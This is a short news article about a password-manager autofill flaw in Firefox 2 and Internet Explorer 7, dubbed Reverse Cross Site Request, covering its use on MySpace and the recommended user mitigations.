A security flaw has been discovered in Mozilla Foundation's Firefox 2 and Microsoft's Internet Explorer 7 web browsers. Hackers can use this flaw to capture the username and password of users.
Firefox's Password Manager Software seems to be the source of the flaw. This software automatically fills the username and password into another login page. A hacker can make use of this flaw by creating a fake login page and the browser would be tricked into providing the username and password.
This can be done on sites that allow user created pages such as blogs and forums. This method was used on the social networking site MySpace reported late October. The hacker registered a username with MySpace and used it to host a fake login page. Users who accessed MySpace using Firefox thereafter had their information compromised.
This flaw has been named Reverse Cross Site Request vulnerability (RCSR) by Robert Chapin, who detected this flaw. RCSR poses a greater threat than Cross-site scripting (XCS) as the page is more convincing and shows no sign of external content or open redirects. The reason why RCSR succeeds in Firefox and IE is that both the browsers do not check the destination server, where the password is being sent. Besides since such a reversal happens at a trusted site the browser brings up no alerts.
Robert Chapin has provided a detailed description of the type of attack that can happen and a presentation of how it works on his site. The site also warns that firewalled local network servers and HTTP addresses that are not generally accessible are most vulnerable to these attacks as the hacker does not require direct access.
Though Firefox has been proven to be completely vulnerable to this attack IE seems to have a better defense. IE will not automatically fill the username and password till it accurately checks the source of the login form. Hence it will be tricked only if the RCSR page appears on the same page as a legitimate login page.
A bug report regarding this flaw has been filed with Mozilla but no fix has yet been found. Security experts have recommended that Firefox's Password Manager be disabled and the Master Password Timeout extension be installed.
This extension locks the master security device after a specific period of inactivity. Users have also been advised to disable the “Remember password for sites” option in Firefox.
